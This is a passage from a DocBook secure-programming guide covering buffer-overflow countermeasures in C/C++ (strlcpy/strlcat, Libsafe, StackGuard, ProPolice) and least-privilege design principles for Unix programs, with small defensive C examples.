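</para>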
|
||
|
||
<para>
|
||
Another alternative is to dynamically reallocate all strings instead of using
|
||
fixed-size buffers.
|
||
This general approach is recommended by the GNU programming guidelines,
|
||
since it permits programs to handle arbitrarily-sized inputs
|
||
(until they run out of memory).
|
||
Of course, the major problem with dynamically allocated strings is that you
|
||
may run out of memory. The memory may even be exhausted at some other
|
||
point in the program than the portion where you're worried about buffer
|
||
overflows; any memory allocation can fail.
|
||
Also, since dynamic reallocation may cause memory to be inefficiently
|
||
allocated, it is entirely possible to run out of memory even though
|
||
technically there is enough virtual memory available to the program
|
||
to continue.
|
||
In addition, before running out of memory the program will probably
|
||
use a great deal of virtual memory; this can easily result in
|
||
``thrashing'', a situation in which the computer spends all its time
|
||
just shuttling information between the disk and memory (instead of
|
||
doing useful work).
|
||
This can have the effect of a denial of service attack.
|
||
Some rational limits on input size can help here.
|
||
In general, the program must be designed to
|
||
fail safely when memory is exhausted if you use dynamically allocated strings.
|
||
</para>
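<para>
A dynamically reallocated string with a rational size limit might be
sketched like this.
Everything named here (struct dynstr, dynstr_append(), and STR_LIMIT) is
an assumption made for illustration, not an existing library interface.
<programlisting>
<![CDATA[
```c
#include <stdlib.h>
#include <string.h>

#define STR_LIMIT (1024 * 1024)   /* hypothetical cap on total length */

struct dynstr {
    char  *data;   /* NIL-terminated contents, or NULL when empty */
    size_t len;    /* length, not counting the NIL */
};

/* Append s to d, growing the allocation as needed.
   Returns 0 on success.  Returns -1 if the limit would be exceeded or
   memory is exhausted; d is left unchanged in either case. */
int dynstr_append(struct dynstr *d, const char *s)
{
    size_t add = strlen(s);
    char *p;

    if (add > STR_LIMIT || d->len > STR_LIMIT - add)
        return -1;
    p = realloc(d->data, d->len + add + 1);
    if (p == NULL)
        return -1;                  /* d->data is still valid */
    memcpy(p + d->len, s, add + 1); /* copies the NIL too */
    d->data = p;
    d->len += add;
    return 0;
}
```
]]>
</programlisting>
Because a failed append leaves the string untouched, the caller can
report the error and carry on, which is one form of failing safely.
</para>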
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="strlcpy">
|
||
<title>strlcpy and strlcat</title>
|
||
|
||
<para>
|
||
An alternative, being employed by OpenBSD, is the
|
||
strlcpy(3) and strlcat(3) functions by Miller and de Raadt [Miller 1999].
|
||
This is a minimalist, statically-sized buffer approach that provides C string
|
||
copying and concatenation with a different (and less error-prone) interface.
|
||
Source and documentation of these functions
|
||
are available under a newer BSD-style open source license at
|
||
<ulink
|
||
url="ftp://ftp.openbsd.org/pub/OpenBSD/src/lib/libc/string/strlcpy.3">ftp://ftp.openbsd.org/pub/OpenBSD/src/lib/libc/string/strlcpy.3</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
First, here are their prototypes:
|
||
|
||
<screen width="61">
|
||
size_t strlcpy (char *dst, const char *src, size_t size);
|
||
size_t strlcat (char *dst, const char *src, size_t size);
|
||
</screen>
|
||
|
||
Both strlcpy and strlcat
|
||
take the full size of the destination buffer as a parameter
|
||
(not the maximum number of characters to be copied) and guarantee to
|
||
NIL-terminate the result (as long as size is larger than 0).
|
||
Remember that you should include a byte for NIL in the size.
|
||
</para>
|
||
|
||
<para>
|
||
The strlcpy function copies up to
|
||
size-1 characters from the NIL-terminated string src to dst,
|
||
NIL-terminating the result.
|
||
The strlcat
|
||
function appends the NIL-terminated string
|
||
src to the end of dst.
|
||
It will append at most
|
||
size - strlen(dst) - 1 bytes, NIL-terminating the result.
|
||
</para>
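<para>
To make the copying rule concrete, here is an illustrative
reimplementation of the strlcpy behavior described above.
It is a sketch, not the OpenBSD source; the name sketch_strlcpy() is
hypothetical and was chosen to avoid clashing with a system-provided
strlcpy.
Like strlcpy, it returns the length of src, so a result that is greater
than or equal to size means the copy was truncated.
<programlisting>
<![CDATA[
```c
#include <string.h>

/* Copy at most size-1 characters of src to dst and NIL-terminate the
   result (when size is nonzero).  Returns strlen(src). */
size_t sketch_strlcpy(char *dst, const char *src, size_t size)
{
    size_t srclen = strlen(src);

    if (size > 0) {
        size_t n = (srclen < size - 1) ? srclen : size - 1;
        memcpy(dst, src, n);
        dst[n] = '\0';
    }
    return srclen;   /* caller compares this against size */
}
```
]]>
</programlisting>
A caller would typically write something like
``if (sketch_strlcpy(buf, s, sizeof(buf)) >= sizeof(buf))'' and treat
that case as an error.
</para>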
|
||
|
||
<para>
|
||
One minor disadvantage of strlcpy(3) and strlcat(3) is that they are
|
||
not, by default, installed in most Unix-like systems.
|
||
In OpenBSD, they are part of &lt;string.h&gt;.
|
||
This is not that difficult a problem; since they are small functions, you can
|
||
even include them in your own program's source (at least as an option),
|
||
and create a small separate package to load them.
|
||
You can even use autoconf to handle this case automatically.
|
||
If more programs use these functions, it won't be long before these are
|
||
standard parts of Linux distributions and other Unix-like systems.
|
||
Also, these functions have
|
||
been recently added to the ``glib'' library (I submitted the patch
|
||
to do this), so using recent versions of glib makes them available.
|
||
In glib these functions are named g_strlcpy and g_strlcat
|
||
(not strlcpy or strlcat) to be consistent with the glib library
|
||
naming conventions.
|
||
</para>
|
||
|
||
<para>
|
||
Also, strlcat(3) has slightly varying semantics
|
||
when the provided size is 0 or if there are no NIL characters in
|
||
the destination string dst (inside the given number of characters).
|
||
In OpenBSD, if the size is 0, then the destination string's length is
|
||
considered 0.
|
||
Also, if size is nonzero, but there are no NIL characters
|
||
in the destination string (in the size number of characters), then
|
||
the length of the destination is considered equal to the size.
|
||
These rules make handling strings without embedded NILs consistent.
|
||
Unfortunately, at least Solaris doesn't (at this time) obey these rules,
|
||
because they weren't specified in the original documentation.
|
||
I've talked to Todd Miller, and he and I agree that the OpenBSD
|
||
semantics are the correct ones (and that Solaris is incorrect).
|
||
The reasoning is simple: under no condition should strlcat or strlcpy
|
||
ever examine characters in the destination outside of the range of size;
|
||
such access might cause core dumps (from accessing out-of-range memory)
|
||
and even hardware interactions (through memory-mapped I/O).
|
||
Thus, given:
|
||
<screen width="61">
|
||
a = strlcat ("Y", "123", 0);
|
||
</screen>
|
||
The correct answer is 3 (0+3=3), but Solaris will claim the answer is 4
|
||
because it incorrectly looks at characters beyond the "size" length in
|
||
the destination.
|
||
For now, I suggest avoiding cases where the size is 0 or the destination
|
||
has no NIL characters.
|
||
Future versions of glib will hide this difference and always use the OpenBSD
|
||
semantics.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="libmib">
|
||
<title>libmib</title>
|
||
|
||
<para>
|
||
One toolset for C that dynamically reallocates strings automatically
|
||
is the ``libmib allocated string functions'' by
|
||
Forrest J. Cavalier III, available at
|
||
<ulink
|
||
url="http://www.mibsoftware.com/libmib/astring">http://www.mibsoftware.com/libmib/astring</ulink>.
|
||
There are two variations of libmib.
``libmib-open'' appears to be clearly open source, released under its own
X11-like license that permits modification and redistribution
(although redistributions must choose a different name);
however, the developer states that it
``may not be fully tested.''
To continuously get libmib-mature, you must pay for a subscription.
|
||
The documentation is not open source, but it is freely available.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="std-string">
|
||
<title>C++ std::string class</title>
|
||
|
||
<para>
|
||
C++ developers can use the std::string class, which is part of the
standard C++ library.
|
||
This is a dynamic approach, as the storage grows as necessary.
|
||
However, it's important to note that if that class's data is turned
|
||
into a ``char *'' (e.g., by using data() or c_str()),
|
||
the possibilities of buffer overflow resurface, so you need to be careful
|
||
when using such methods.
|
||
Note that c_str() always returns a NIL-terminated string, but
before C++11 data() may or may not (it was implementation dependent, and
many implementations did not include the NIL terminator).
Avoid using data() where a NIL-terminated string is expected, and if you
must use it, don't be dependent on its format.
|
||
</para>
|
||
|
||
<para>
|
||
Many C++ developers use other string libraries as well, such as
|
||
those that come with other large libraries or even home-grown string libraries.
|
||
With those libraries, be especially careful - many
|
||
alternative C++ string classes
|
||
include routines to automatically convert the class to a ``char *'' type.
|
||
As a result, they can silently introduce buffer overflow vulnerabilities.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="libsafe">
|
||
<title>Libsafe</title>
|
||
|
||
<para>
|
||
Arash Baratloo, Timothy Tsai, and Navjot Singh
|
||
(of Lucent Technologies)
|
||
have developed Libsafe, a wrapper of several library functions known to be
|
||
vulnerable to stack smashing attacks.
|
||
This wrapper (which they call a kind of ``middleware'')
|
||
is a simple dynamically loaded library that contains modified versions
|
||
of C library functions such as strcpy(3).
|
||
These modified versions
|
||
implement the original functionality, but in a manner that ensures
|
||
that any buffer overflows are contained within the current stack frame.
|
||
Their initial performance analysis suggests that this
|
||
library's overhead is very small.
|
||
Libsafe papers and source code are available at
|
||
<ulink url="http://www.research.avayalabs.com/project/libsafe">
|
||
http://www.research.avayalabs.com/project/libsafe</ulink>.
|
||
<!-- <ulink url="http://www.bell-labs.com/org/11356/libsafe.html">http://www.bell-labs.com/org/11356/libsafe.html</ulink>.
|
||
-->
|
||
The Libsafe source code is available under the completely
|
||
open source LGPL license.
|
||
</para>
|
||
|
||
<para>
|
||
Libsafe's approach appears somewhat useful.
|
||
Libsafe should certainly be considered for inclusion by Linux
|
||
distributors, and its approach is worth considering by others as well.
|
||
For example, I know that the Mandrake distribution of Linux (version
|
||
7.1) includes it.
|
||
<!-- http://www.sopac.org/linux/RPM/mandrake/7.1/Mandrake/RPMS2/Linux-Mandrake.html -->
|
||
However, from a software developer's point of view, Libsafe is a useful
mechanism to support defense-in-depth, but it does not really prevent
buffer overflows.
|
||
Here are several reasons why you shouldn't depend just on Libsafe
|
||
during code development:
|
||
<itemizedlist>
|
||
|
||
<listitem><para>
|
||
Libsafe only protects a small set of known functions with obvious
|
||
buffer overflow issues.
|
||
At the time of this writing, this list is significantly shorter than
|
||
the list of functions in this book known to have this problem.
|
||
It also won't protect against code you write yourself (e.g., in
|
||
a while loop) that causes buffer overflows.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Even if libsafe is installed in a distribution, the way it is installed
|
||
impacts its use.
|
||
The documentation recommends setting LD_PRELOAD
|
||
to cause libsafe's protections to be enabled, but the problem
|
||
is that users can unset this environment variable... causing the
|
||
protection to be disabled for programs they execute!
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Libsafe only protects against buffer overflows of the stack onto the
|
||
return address;
|
||
you can still overrun the heap or other variables in that procedure's frame.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Unless you can be assured that all deployed platforms will use libsafe
|
||
(or something like it), you'll have to protect your program as though
|
||
it wasn't there.
|
||
</para></listitem>
|
||
|
||
|
||
<listitem><para>
|
||
Libsafe seems to assume that saved frame pointers are at the beginning of
|
||
each stack frame. This isn't always true.
|
||
Compilers (such as gcc) can optimize away things, and in particular the
|
||
option "-fomit-frame-pointer" removes the information that libsafe
|
||
seems to need.
|
||
Thus, libsafe may fail to work for some programs.
|
||
<!-- More info at:
|
||
http://msgs.securepoint.com/cgi-bin/get/bugtraq0004/109/1.html
|
||
http://www2.merton.ox.ac.uk/~security/security-audit-200004/0069.html -->
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
</para>
|
||
|
||
<para>
|
||
The libsafe developers themselves acknowledge that software developers
|
||
shouldn't just depend on libsafe.
|
||
In their words:
|
||
|
||
<blockquote><para>
|
||
It is generally accepted that the best solution to
|
||
buffer overflow attacks is to fix the defective programs.
|
||
However, fixing defective programs requires knowing that
|
||
a particular program is defective.
|
||
The true benefit of using libsafe and other alternative
|
||
security measures is protection against future attacks
|
||
on programs that are not yet known to be vulnerable.
|
||
</para></blockquote>
|
||
</para>
|
||
</sect2>
|
||
|
||
<sect2 id="other-buffer-libraries">
|
||
<title>Other Libraries</title>
|
||
|
||
<para>
|
||
The glib (not glibc) library is a widely-available
|
||
open source library that provides
|
||
a number of useful functions for C programmers.
|
||
GTK+ and GNOME both use glib, for example.
|
||
As I noted earlier, in glib version 1.3.2, g_strlcpy() and g_strlcat() have
|
||
been added through a patch which I submitted. This should make it easier to
|
||
portably use those functions once these later versions of glib
|
||
become widely available.
|
||
At this time I do not have an analysis showing definitively that the
|
||
glib library functions protect against buffer overflows.
|
||
However, many of the glib functions automatically allocate memory,
|
||
and those functions automatically
|
||
<emphasis>fail with no reasonable way to intercept the failure</emphasis>
|
||
(e.g., to try something else instead).
|
||
As a result, many glib functions are unsuitable for secure programs
that must handle out-of-memory conditions gracefully.
|
||
The GNOME guidelines recommend using functions such as
|
||
g_strdup_printf(), which is fine as long as it's okay if your program
|
||
immediately crashes if an out-of-memory condition occurs.
|
||
However, if you can't accept this, then using such routines isn't appropriate.
|
||
</para>
|
||
|
||
<!--
|
||
??? Need to investigate if standard demands safety.
|
||
C++ has a set of string classes and templates as well
|
||
(see basic_string and string)
|
||
-->
|
||
|
||
</sect2>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="compilation-c">
|
||
<title>Compilation Solutions in C/C++</title>
|
||
|
||
<para>
|
||
A completely different approach is to use compilation methods that perform
|
||
bounds-checking (see [Sitaker 1999] for a list).
|
||
In my opinion, such tools are very useful in having multiple layers of
|
||
defense, but it's not wise to use this technique as your sole defense.
|
||
There are at least two reasons for this.
|
||
First of all, such tools generally only provide a partial defense against
|
||
buffer overflows (and the ``complete'' defenses are generally
|
||
12-30 times slower); C and C++ were simply not designed to protect
|
||
against buffer overflows.
|
||
<!--
|
||
See Bugtraq, 23 Apr 2002,
|
||
Iván Arce <core.lists.bugtraq@core-sdi.com>,
|
||
which discusses how to circumvent them.
|
||
-->
|
||
Second of all, for open source programs you cannot be certain what tools
|
||
will be used to compile the program; using the default ``normal'' compiler
|
||
for a given system might suddenly open security flaws.
|
||
</para>
|
||
|
||
<para>
|
||
One of the more useful tools is ``StackGuard'', a modification of the
|
||
standard GNU C compiler gcc.
|
||
StackGuard works by inserting a ``guard'' value (called a ``canary'')
|
||
in front of the return address; if a buffer overflow
|
||
overwrites the return address, the canary's value (hopefully) changes
|
||
and the system detects this before using it.
|
||
This is quite valuable, but note that this does not protect against
|
||
buffer overflows overwriting other values (which they may still be able
|
||
to use to attack a system).
|
||
There is work to extend StackGuard to be able to add canaries to other
|
||
data items, called ``PointGuard''.
|
||
PointGuard will automatically protect certain values (e.g., function
|
||
pointers and longjump buffers).
|
||
However, protecting other variable types using PointGuard
|
||
requires specific programmer intervention (the programmer
|
||
has to identify which data values must be protected with canaries).
|
||
This can be valuable, but it's easy to accidentally omit
|
||
protection for a data value you didn't think needed protection -
|
||
but needs it anyway.
|
||
More information on StackGuard, PointGuard, and other alternatives
|
||
is in Cowan [1999].
|
||
</para>
|
||
|
||
<para>
|
||
<ulink url="http://www.trl.ibm.com/projects/security/ssp">
|
||
IBM has developed a stack protection system called ProPolice
|
||
based on the ideas of StackGuard</ulink>.
|
||
IBM's current website does not use the name ProPolice; it simply calls it
a "GCC extension for protecting applications from stack-smashing attacks."
Like StackGuard, ProPolice
is a GCC (GNU Compiler Collection) extension that protects
applications written in C by automatically inserting
protection code into an application at compilation time.
ProPolice differs from StackGuard, however, by adding
three features:
|
||
(1) reordering local variables to place buffers after pointers
|
||
(to avoid the corruption of pointers that could be used
|
||
to further corrupt arbitrary memory locations),
|
||
(2) copying pointers in function arguments to an area
|
||
preceding local variable buffers (to prevent the corruption of pointers
|
||
that could be used to further corrupt arbitrary memory locations), and
|
||
(3) omitting instrumentation code from some functions
|
||
(it basically assumes that only character arrays are dangerous; while
|
||
this isn't strictly true, it's mostly true, and as a result ProPolice
|
||
has better performance while retaining most of its protective capabilities).
|
||
The IBM website includes information for how to build Red Hat Linux and
|
||
FreeBSD with this protection;
|
||
<ulink url="http://www.deadly.org/article.php3?sid=20021202175508">OpenBSD
|
||
has already added ProPolice to their base system</ulink>.
|
||
I think this is extremely promising, and I hope to see this capability included
|
||
in future versions of gcc and used in various distributions.
|
||
In fact, I think this kind of capability should be the default -
|
||
this would mean that the largest single class of attacks would no longer
|
||
enable attackers to take control in most cases.
|
||
</para>
|
||
|
||
<para>
|
||
As a related issue, in Linux you could modify the Linux kernel so that
|
||
the stack segment is not executable; such a patch to Linux does exist
|
||
(see Solar Designer's patch, which includes this, at
|
||
<ulink
|
||
url="http://www.openwall.com/linux/">http://www.openwall.com/linux/</ulink>).
|
||
However, as of this writing this is not built into the Linux kernel.
|
||
Part of the rationale is that this is less protection than it seems;
|
||
attackers can simply force the system to call other ``interesting'' locations
|
||
already in the program (e.g., in its library, the heap,
|
||
or static data segments).
|
||
Also, sometimes Linux does require executable code in the stack,
|
||
e.g., to implement signals and to implement GCC ``trampolines''.
|
||
Solar Designer's patch does handle these cases, but this does
|
||
complicate the patch.
|
||
Personally, I'd like to see this merged into the main Linux
|
||
distribution, since it does make attacks somewhat more difficult and
|
||
it defends against a range of existing attacks.
|
||
However, I agree with Linus Torvalds and others
|
||
that this does not add the amount of protection it would appear to and
|
||
can be circumvented with relative ease.
|
||
You can read Linus Torvalds' explanation for not including this support at
|
||
<!-- was: http://lwn.net/980806/a/linus-noexec.html -->
|
||
<ulink url="http://old.lwn.net/1998/0806/a/linus-noexec.html">
|
||
http://old.lwn.net/1998/0806/a/linus-noexec.html</ulink>.
|
||
|
||
</para>
|
||
|
||
<para>
|
||
In short, it's better to work first on developing a correct program
|
||
that defends itself against buffer overflows.
|
||
Then, after you've done this, by all means use techniques and tools
|
||
like StackGuard as an additional safety net.
|
||
If you've worked hard to eliminate buffer overflows in the code itself,
|
||
then StackGuard (and tools like it)
are likely to be more effective because there will be
|
||
fewer ``chinks in the armor'' that StackGuard will be called on to protect.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="other-languages">
|
||
<title>Other Languages</title>
|
||
|
||
<para>
|
||
The problem of buffer overflows is an excellent argument for using
|
||
other programming languages
|
||
such as Perl, Python, Java, and Ada95.
|
||
After all, nearly all other programming languages used today
|
||
(other than assembly language) protect against buffer overflows.
|
||
Using those other languages does not eliminate all problems, of course;
|
||
in particular see the discussion in <xref linkend="handle-metacharacters">
|
||
regarding the NIL character.
|
||
There is also the problem of ensuring that those other languages'
|
||
infrastructure (e.g., run-time library) is available and secured.
|
||
Still, you should certainly consider using other programming languages
|
||
when developing secure programs to protect against buffer overflows.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
</chapter>
|
||
|
||
<chapter id="internals">
|
||
<title>Structure Program Internals and Approach</title>
|
||
|
||
<epigraph>
|
||
<attribution>Proverbs 25:28 (NIV)</attribution>
|
||
<para>
|
||
Like a city whose walls are broken down is a man who lacks self-control.
|
||
</para>
|
||
</epigraph>
|
||
|
||
<sect1 id="follow-good-principles">
|
||
<title>Follow Good Software Engineering Principles for Secure Programs</title>
|
||
|
||
<para>
|
||
Saltzer [1974] and later Saltzer and Schroeder [1975]
|
||
list the following principles of the design of secure
|
||
protection systems, which are still valid:
|
||
|
||
<itemizedlist>
|
||
<listitem>
|
||
|
||
<para>
|
||
<emphasis remap="it">Least privilege</emphasis>.
|
||
Each user and program should operate using the fewest privileges possible.
|
||
This principle limits the damage from an accident, error, or attack.
|
||
It also reduces the number of potential interactions among privileged programs,
|
||
so unintentional,
|
||
unwanted, or improper uses of privilege are less likely to occur.
|
||
This idea can be extended to the internals of a program: only the smallest
|
||
portion of the program which needs those privileges should have them.
|
||
See <xref linkend="minimize-privileges"> for more about how to do this.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
<emphasis remap="it">Economy of mechanism/Simplicity</emphasis>.
|
||
The protection system's design should be as simple and
small as possible.
|
||
In their words,
|
||
``techniques such as line-by-line inspection of software and physical
|
||
examination of hardware that implements protection mechanisms are necessary.
|
||
For such techniques to be successful, a small and simple design is essential.''
|
||
This is sometimes described as the ``KISS'' principle
|
||
(``keep it simple, stupid'').
|
||
</para>
|
||
</listitem>
|
||
|
||
|
||
<listitem>
|
||
<para>
|
||
<emphasis remap="it">Open design</emphasis>.
|
||
The protection mechanism must not depend on attacker ignorance.
|
||
Instead, the mechanism should be public, depending on the secrecy of
|
||
relatively few (and easily changeable) items like passwords or private keys.
|
||
An open design makes extensive public scrutiny possible, and it also
|
||
makes it possible for users to convince themselves that the system about
|
||
to be used is adequate.
|
||
Frankly, it isn't realistic to try to maintain secrecy for a system that
|
||
is widely distributed;
|
||
decompilers and subverted hardware can quickly expose any ``secrets''
|
||
in an implementation.
|
||
Bruce Schneier argues that smart engineers should ``demand
|
||
open source code for anything related to security'',
|
||
as well as ensuring that it receives widespread review and that
|
||
any identified problems are fixed [Schneier 1999].
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
<emphasis remap="it">Complete mediation</emphasis>.
|
||
Every access attempt must be checked; position the mechanism
|
||
so it cannot be subverted.
|
||
For example, in a client-server model, generally the server must do all
|
||
access checking because users can build or modify their own clients.
|
||
This is the point of all of
|
||
<xref linkend="input">, as well as
|
||
<xref linkend="secure-interface">.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
<emphasis remap="it">Fail-safe defaults (e.g., permission-based approach)</emphasis>.
|
||
The default should be denial of access, and the
|
||
protection scheme should then identify conditions under which
|
||
access is permitted.
|
||
See <xref linkend="safe-configure"> and <xref linkend="fail-safe">
|
||
for more.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
<emphasis remap="it">Separation of privilege</emphasis>.
|
||
Ideally, access to objects should depend on more than one condition, so
|
||
that defeating one protection system won't enable complete access.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
<emphasis remap="it">Least common mechanism</emphasis>.
|
||
Minimize the amount and
|
||
use of shared mechanisms (e.g., use of the /tmp or /var/tmp directories).
|
||
Shared objects provide potentially dangerous channels for information
|
||
flow and unintended interactions.
|
||
See <xref linkend="avoid-race"> for more information.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
<emphasis remap="it">Psychological acceptability / Easy to use</emphasis>.
|
||
The human interface must be designed for ease of use so users will routinely
|
||
and automatically use the protection mechanisms correctly.
|
||
Mistakes will be reduced if
|
||
the security mechanisms closely match the user's mental image of
|
||
his or her protection goals.
|
||
</para>
|
||
</listitem>
|
||
|
||
</itemizedlist>
|
||
|
||
</para>
|
||
|
||
<para>
|
||
A good overview of various design principles for security is available in
|
||
Peter Neumann's
|
||
<ulink url="http://www.csl.sri.com/users/neumann/chats.html#4">
|
||
Principled Assuredly Trustworthy Composable Architectures</ulink>.
|
||
<!--
|
||
???: Add:
|
||
http://www.csl.sri.com/neumann/chats2.pdf
|
||
http://www.csl.sri.com/neumann/chats2.ps
|
||
-->
|
||
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="secure-interface">
|
||
<title>Secure the Interface</title>
|
||
|
||
<para>
|
||
Interfaces should be minimal (as simple as possible), narrow
|
||
(provide only the functions needed), and non-bypassable.
|
||
Trust should be minimized.
|
||
Consider limiting the data that the user can see.
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="data-vs-control">
|
||
<title>Separate Data and Control</title>
|
||
<para>
|
||
Any files you support should be designed to completely separate
|
||
(passive) data from programs that are executed.
|
||
Applications and data viewers may be used to
|
||
display files developed externally, so in general don't allow them
|
||
to accept programs (also known as ``scripts'' or ``macros'').
|
||
The most dangerous kind is an auto-executing macro that executes
|
||
when the application is loaded and/or when the data is initially
|
||
displayed; from a security point-of-view this is generally
|
||
a disaster waiting to happen.
|
||
</para>
|
||
|
||
<para>
|
||
If you truly must support programs downloaded remotely
|
||
(e.g., to implement an existing standard), make sure that you
|
||
have extremely strong control over what the macro can do
|
||
(this is often called a ``sandbox'').
|
||
Past experience has shown that real sandboxes are hard to implement correctly.
|
||
In fact, I can't remember a single widely-used sandbox that hasn't been
|
||
repeatedly exploited (yes, that includes Java).
|
||
If possible, at least have the programs stored in a separate file, so that
|
||
it's easier to block them out when another sandbox flaw has been found
|
||
but not yet fixed.
|
||
Storing them separately also makes it easier to reuse code and to cache
|
||
it when helpful.
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="minimize-privileges">
|
||
<title>Minimize Privileges</title>
|
||
|
||
<para>
|
||
As noted earlier, it is an important general
|
||
principle that a program should have the minimum privileges
|
||
necessary to do its job (this is termed ``least privilege'').
|
||
That way, if the program is broken, its damage is limited.
|
||
The most extreme example is to simply not write a secure program at all -
|
||
if this can be done, it usually should be.
|
||
For example, don't make your program setuid or setgid if you can avoid it; just
|
||
make it an ordinary program, and require the administrator to log in with the needed privileges
|
||
before running it.
|
||
</para>
|
||
|
||
<para>
|
||
In Linux and Unix, the primary determiner of a process' privileges
|
||
is the set of id's associated with it:
|
||
each process has a real, effective and saved id for both the user and group
|
||
(a few very old Unixes don't have a ``saved'' id).
|
||
Linux also has, as a special extension, a separate filesystem UID and GID
|
||
for each process.
|
||
Manipulating these values is critical to keeping privileges minimized,
|
||
and there are several ways to minimize them (discussed below).
|
||
You can also use chroot(2) to minimize the files visible to a program,
|
||
though chroot() can be difficult to use correctly.
|
||
There are a few other values determining privilege in Linux and Unix, for
|
||
example, POSIX capabilities (supported by Linux 2.2 and greater, and by
|
||
some other Unix-like systems).
|
||
</para>
|
||
|
||
<sect2 id="mimimize-privileges-granted">
|
||
<title>Minimize the Privileges Granted</title>
|
||
|
||
<para>
|
||
Perhaps the most effective technique is to simply minimize
|
||
the highest privilege granted.
|
||
In particular, avoid granting a program root privilege if possible.
|
||
Don't make a program <emphasis remap="it">setuid root</emphasis> if it only needs access
|
||
to a small set of files;
|
||
consider creating separate user or group accounts for different functions.
|
||
</para>
|
||
|
||
<para>
|
||
A common technique is to
|
||
create a special group, change a file's group ownership to that group,
|
||
and then make the program <emphasis remap="it">setgid</emphasis> to that group.
|
||
It's better to make a program <emphasis remap="it">setgid</emphasis> instead of <emphasis remap="it">setuid</emphasis>
|
||
where you can,
|
||
since group membership grants fewer rights (in particular, it does not
|
||
grant the right to change file permissions).
|
||
</para>
|
||
|
||
<para>
|
||
This is commonly done for game high scores.
|
||
Games are usually setgid <emphasis remap="it">games</emphasis>,
|
||
the score files are owned by the group <emphasis remap="it">games</emphasis>,
|
||
and the programs themselves and their configuration files
|
||
are owned by someone else (say root).
|
||
Thus, breaking into a game allows the perpetrator to change high scores but
|
||
doesn't grant the privilege to change the game's executable or
|
||
configuration file.
|
||
The latter is important; if an attacker could change a game's executable
|
||
or its configuration files (which might control what the executable runs),
|
||
then they might be able to gain control of a user who ran the game.
|
||
</para>
|
||
|
||
<para>
|
||
If creating a new group isn't sufficient, consider creating a
|
||
new pseudouser (really, a special role) to manage a set of resources -
|
||
often a new pseudogroup (again, a special role) is also created just
|
||
to run a program.
|
||
Web servers typically do this; often web servers are set up with a special
|
||
user (``nobody'') so that they can be isolated from other users.
|
||
Indeed, web servers are instructive here: web servers typically need
|
||
root privileges to start up (so they can attach to port 80), but once
|
||
started they usually shed all their privileges and run as the user ``nobody''.
|
||
However, don't use the ``nobody'' account (unless you're writing a
|
||
webserver); instead, create your own pseudouser or new group.
|
||
The purpose of this approach is to isolate different programs,
|
||
processes, and data from each other,
|
||
by exploiting the operating system's ability to keep users and groups separate.
|
||
If different programs shared the same account, then breaking into one program
|
||
would also grant privileges to the other.
|
||
Usually the pseudouser should not own the programs it runs;
|
||
that way, an attacker who breaks into the account cannot change
|
||
the program it runs.
|
||
By isolating different parts of the system so they run as separate users
|
||
and groups, breaking one part will not necessarily break the
|
||
whole system's security.
|
||
<!--
|
||
Martijn Vernooij noted http://httpd.apache.org/docs/mod/core.html#user :
|
||
|
||
The user should have no privileges which result in it being able to
|
||
access files which are not intended to be visible to the outside world,
|
||
and similarly, the user should not be able to execute code which is not
|
||
meant for httpd requests. It is recommended that you set up a new user
|
||
and group specifically for running the server. Some admins use user nobody,
|
||
but this is not always possible or desirable.
|
||
-->
|
||
</para>
|
||
|
||
<para>
|
||
If you're using a database system (say, by calling its query interface),
|
||
limit the rights of the database user that the application uses.
|
||
For example, don't give that user access to all of the system stored procedures
|
||
if that user only needs access to a handful of user-defined ones.
|
||
Do everything you can inside stored procedures.
|
||
That way, even if someone does manage to force arbitrary strings into the
|
||
query, the damage that can be done is limited.
|
||
If you must directly pass a regular SQL query with client supplied data
|
||
(and you usually shouldn't), wrap it in something that limits its activities
|
||
(e.g., sp_sqlexec).
|
||
(My thanks to SPI Labs for these database system suggestions).
|
||
<!-- http://www.spidynamics.com/papers/SQLInjectionWhitePaper.pdf -->
|
||
</para>
|
||
|
||
<para>
|
||
If you <emphasis remap="it">must</emphasis> give a program privileges
|
||
usually reserved for root,
|
||
consider using POSIX capabilities to minimize the privileges
available to your program as soon as it can do so.
|
||
POSIX capabilities are available in Linux 2.2 and in many other
|
||
Unix-like systems.
|
||
By calling cap_set_proc(3) or the Linux-specific capsetp(3)
|
||
routines immediately after starting, you can permanently
|
||
reduce the abilities of your program to just those abilities it actually needs.
|
||
For example the network time daemon (ntpd) traditionally has run as root,
|
||
because it needs to modify the current time.
|
||
However, patches have been developed so ntpd only needs a single
|
||
capability, CAP_SYS_TIME, so even if an attacker gains control over
|
||
ntpd it's somewhat more difficult to exploit the program.
|
||
</para>
|
||
|
||
<para>
|
||
I say ``somewhat more difficult'' because, unless other steps are taken,
|
||
retaining a privilege using POSIX capabilities
|
||
requires that the process continue to have the root user id.
|
||
Because many important files (configuration files, binaries, and so on)
|
||
are owned by root, an attacker controlling a program
|
||
with such limited capabilities can still modify
|
||
key system files and gain full root-level privilege.
|
||
A Linux kernel extension (available in versions 2.4.X and 2.2.19+)
|
||
<!-- It's available from 2.3.99-pre3 on, but now that 2.4's released the
|
||
exact development version is only of academic interest.
|
||
Chris Evans thought it might also be available in 2.2.18, but wasn't
|
||
sure, so I thought I'd be safe and specify 2.2.19. -->
|
||
provides a better way to limit the available privileges:
|
||
a program can start as root (with all POSIX capabilities),
|
||
